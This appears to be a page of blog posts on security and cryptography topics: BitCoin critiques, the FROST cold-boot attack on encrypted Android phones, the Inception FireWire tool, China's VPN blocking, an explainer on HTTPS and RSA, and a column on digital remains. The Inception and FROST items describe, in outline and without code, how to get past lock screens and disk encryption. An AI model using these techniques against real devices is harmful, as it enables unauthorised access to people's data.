Ben Laurie on BitCoin —

I wrote yesterday about Dan Kaminsky's excellent thoughts on BitCoin, and wished aloud for comparable work from Ben Laurie. It turns out such work exists: here's Ben's critique of BitCoin, and here's his proposal for an alternative. Both are short, clear, excellent reads. — Cory •

This is alarming, if true: according to a group of German security researchers at the University of Erlangen, if you put a locked, encrypted Android phone in the freezer for an hour and then quickly reboot it and plug it into a laptop, the memory will retain enough charge to stay decrypted, and can boot up into a custom OS that can recover the keys and boot the phone up with all the files available in the clear. The attack is called FROST: "Forensic Recovery Of Scrambled Telephones," and it requires a phone with an unlocked bootloader to work.

At the end of 2011, Google released version 4.0 of its Android operating system for smartphones. For the first time, Android smartphone owners were supplied with a disk encryption feature that transparently scrambles user partitions, thus protecting sensitive user information against targeted attacks that bypass screen locks. On the downside, scrambled telephones are a a nightmare for IT forensics and law enforcement, because once the power of a scrambled device is cut any chance other than bruteforce is lost to recover data.

We present FROST, a tool set that supports the forensic recovery of scrambled telephones. To this end we perform cold boot attacks against Android smartphones and retrieve disk encryption keys from RAM. We show that cold boot attacks against Android phones are generally possible for the first time, and we perform our attacks practically against Galaxy Nexus devices from Samsung. To break disk encryption, the bootloader must be unlocked before the attack because scrambled user partitions are wiped during unlocking. However, we show that cold boot attacks are more generic and allow to retrieve sensitive information, such as contact lists, visited web sites, and photos, directly from RAM, even though the bootloader is locked.

FROST: Forensic Recovery Of Scrambled Telephones

Cypherpunks -- a quick, stirring, scary read -- transcribes a wide-ranging conversation between Wikileaks co-founder Julian Assange, Jacob Appelbaum (Wikileaks/Tor Project), Andy Müller-Maguhn (Chaos Computer Club) and Jérémie Zimmermann (La Quadrature Du Net).

Edited together in thematic chapters (The Militarization of Cyberspace, Fighting Total Surveillance With the Laws of Physics, Private Sector Spying), Cypherpunks exceeded my expectations. I know some of the book's protagonists personally and know how smart and principled they are. But I was afraid, going into this, that what would emerge would be a kind of preaching-to-the-choir consensus, because all four of the participants are on the same side.

Instead, I found Cypherpunks to be a genuine debate, where each speaker's best arguments -- well-polished, well-spoken, and convincing -- were mercilessly tested by the others, who subjected them to hard questions and rigorous inspection. Most of our discussions about Wikileaks lack nuance, and they're often hijacked by personal questions about Assange. Whatever you feel about Assange, he is not Wikileaks -- Wikileaks is an activity, not an organization, and its participants, including Bradley Manning, are engaged in something important and difficult and fraught, and there is a place for a debate about whether the tactics of Wikileaks best serve a the strategic end of a free and open Internet in a just and humane society.

The debate recorded in Cypherpunks -- though leavened with humor and easy to follow -- covers a lot of nuance of the sort that has been missing from the discussion. The wider points -- that the universe's in-built mathematics favor the keeping of secrets because it is easier to encrypt a message than decrypt it, say -- may dazzle, but the getting down to cases afterward, the chewing the point over and challenging it, that's where the book shines.

There aren't many titles that pack as much argument, ambiguity and theory into as small a package as Cypherpunks. It's a book you can read in an hour or two, but you'll be thinking about it for years.

Cypherpunks

As you've no doubt gleaned, I'm on tour with my new novel, Homeland. A lot of people commiserate with me about the grueling pace -- and it is! a new city practically every day and nowhere near enough sleep and continuous interviews and presentations from o-dark hundred to late at night -- but for all that, it's actually something I love. That's because I get to meet readers, especially young readers (I do a lot of school presentations) and readers tell me about how my books have affected them, and it's generally both humbling and delightful.

But every now and again, I hear from a reader whose description of her or his experience with my work leaves me, well, speechless. This is one such letter, from a young man named Brian, who emailed me this morning, and graciously gave me permission to post his letter. I'm posting it to let you know -- and to remind me -- that for all that touring is sometimes a lot of work, the end result is that my books end up in the hands of people for whom they can be revelatory. It's such an awesome responsibility, and such a wonderful one. Thank you, Brian.

Read the rest

Buzzing around the internet this week: Polish security researcher and professor Wojciech Mazurczyk (left) claims to be developing a way to hide secret, un-eavesdroppable messages in "silent" packets transmitted within Skype conversations. He and his team plan to present SkypeHide at a steganography conference in Montpellier, France, this coming June. VentureBeat has a writeup here. The ease with which Skype can be snooped by law enforcement is well-known. I'll be interested to hear what other security researchers make of Mazurczyk's project, when and if it is eventually released.

Inception is a tool for breaking into computers with full-disk encryption. It assumes that you have access to a suspended/screen-locked computer whose disk is encrypted. You access the machine over its FireWire interface (or, if it doesn't have FireWire, you plug a FireWire card into one of its slots, and the machine will automatically fetch, install and configure the drivers, even if it's asleep), and then use the FireWire drivers to directly access system memory, and from there, patch the password-checking routine and walk straight into the computer.

This (and its predecessors, like winlockpwn) is a substantial advance on previous attacks against sleeping full-disk encrypted systems, which involved things like plunging the RAM into a bath of liquid nitrogen. As the author, Carsten Maartmann-Moe, points out, this can't be easily remedied with a FireWire driver update, since FireWire requires direct memory access to effect high-speed transfers.

So, two things: First, shut down your computer when it's not in your possession; second, "Inception" is an inspired name for an attack that breaks into the dreams of a sleeping computer, directly accesses its memory, and causes it to spill its secrets.

Inception’s main mode works as follows: By presenting a Serial Bus Protocol 2 (SBP-2) unit directory to the victim machine over the IEEE1394 FireWire interface, the victim operating system thinks that a SBP-2 device has connected to the FireWire port. Since SBP-2 devices utilize Direct Memory Access (DMA) for fast, large bulk data transfers (e.g., FireWire hard drives and digital camcorders), the victim lowers its shields and enables DMA for the device. The tool now has full read/write access to the lower 4GB of RAM on the victim. Once DMA is granted, the tool proceeds to search through available memory pages for signatures at certain offsets in the operating system’s password authentication modules. Once found, the tool short circuits the code that is triggered if an incorrect password is entered.

An analogy for this operation is planting an idea into the memory of the machine; the idea that every password is correct. In other words, the nerdy equivalent of a memory inception.

After running the tool you should be able to log into the victim machine using any password.

Inception (via JWZ)

A new rev of the Great Firewall of China seeks out VPN connections (including, I assume, connections over The Onion Router) and terminates them. Only companies who register official VPNs with the Chinese government will be able to run them without interference. Registration is only available to Chinese companies, and I'll bet it involves escrowing your keys with the Chinese net-cops so they can spy on it.

Users in China suspected in May 2011 that the government there was trying to disrupt VPN use, and now VPN providers have begun to notice the effects.

Astrill, a VPN provider for users inside and outside China, has emailed its users to warn them that the "Great Firewall" system is blocking at least four of the common protocols used by VPNs, which means that they don't function. "This GFW update makes a lot of harm to business in China," the email says. "We believe [the] China censorship minister is a smart man … and this blockage will be removed and things will go back to normal."

But the company added that trying to stay ahead of the censors is a "cat-and-mouse game" – although it is working on a new system that it hopes will let it stay ahead of the detection system.

China tightens 'Great Firewall' internet control with new technology [Charles Arthur/The Guardian]

BBC Radio 4's great math and science show "The Infinite Monkey Cage" did a great (and very funny) episode on crypto and Bletchley Park, with Robin Ince, Brian Cox, Dave Gorman, Simon Singh and Dr Sue Black.

Secret Science

MP3

(via Schneier)

Jeff Moser has a clear, fascinating enumeration of all the incredible math stuff that happens between a server and your browser when you click on an HTTPS link and open a secure connection to a remote end. It's one of the most important (and least understood) parts of the technical functioning of the Internet.

People sometimes wonder if math has any relevance to programming. Certificates give a very practical example of applied math. Amazon's certificate tells us that we should use the RSA algorithm to check the signature. RSA was created in the 1970's by MIT professors Ron *R*ivest, Adi *S*hamir, and Len *A*dleman who found a clever way to combine ideas spanning 2000 years of math development to come up with a beautifully simple algorithm:

You pick two huge prime numbers "p" and "q." Multiply them to get "n = p*q." Next, you pick a small public exponent "e" which is the "encryption exponent" and a specially crafted inverse of "e" called "d" as the "decryption exponent." You then make "n" and "e" public and keep "d" as secret as you possibly can and then throw away "p" and "q" (or keep them as secret as "d"). It's really important to remember that "e" and "d" are inverses of each other.

Now, if you have some message, you just need to interpret its bytes as a number "M." If you want to "encrypt" a message to create a "ciphertext", you'd calculate:

C ≡ Me (mod n)

This means that you multiply "M" by itself "e" times. The "mod n" means that we only take the remainder (e.g. "modulus") when dividing by "n." For example, 11 AM + 3 hours ≡ 2 (PM) (mod 12 hours). The recipient knows "d" which allows them to invert the message to recover the original message:

Cd ≡ (Me)d ≡ Me*d ≡ M1 ≡ M (mod n)

The First Few Milliseconds of an HTTPS Connection (via O'Reilly Radar)

My latest Locus magazine column is "The Internet of the Dead," which discusses the collision course the Internet is on with death. It was inspired by my work to preserve the personal data of my old friend Erik "Possum Man" Stewart, who died unexpectedly and tragically in June:

It was while I sat in Possum’s room that I began to think about his computer. It was a homemade Franken-PC that sat under his desk, its wheezy fan making a racket like an ancient refrigerator. After I’d left Possum’s house and headed back to the airport, I got to thinking about that computer. I strongly suspected that Possum would have copied over all the data of his life – all the e-mails and lists and photos and movies and programs and essays and stories and, well, *everything* – onto each new machine, keeping it all live and handy. After all, hard-drives are cheap – especially if you’re building your own tower PC with lots of full-height drive bays – and their capacity increases exponentially, year on year. It’s been a long time since it made sense to keep your archives in a shoebox full of Zip cartridges or floppy drives. If you buy a PC every couple of years, your new machine will almost certainly have more than twice the hard-drive space of your old one. Keeping your data on your live, spinning platter means that it will get saved every time you do your regular backup (assuming you perform this essential ritual!), and if the drive starts to fail, you’ll know about it right away. It’s not like dragging an old floppy out of a dusty box and praying that it hasn’t succumbed to bitrot since it was put away.

Possum never uploaded his consciousness to a computer, but he approximated such a transfer, one keystroke at a time, year after year, filling those noisy, full-height drives with all his secrets, all his creative outpourings, all his minutiae and mundane trivialities and extraordinary profundities. It’s a transfer we’re all effecting, but Possum got a head start on most of us, kicking off the project in the 1980s. That homely, rackety tower under Possum’s desk was him, in some important sense – in the same sense that my laptop holds a good deal of what it means to be me.

Cory Doctorow: The Internet of the Dead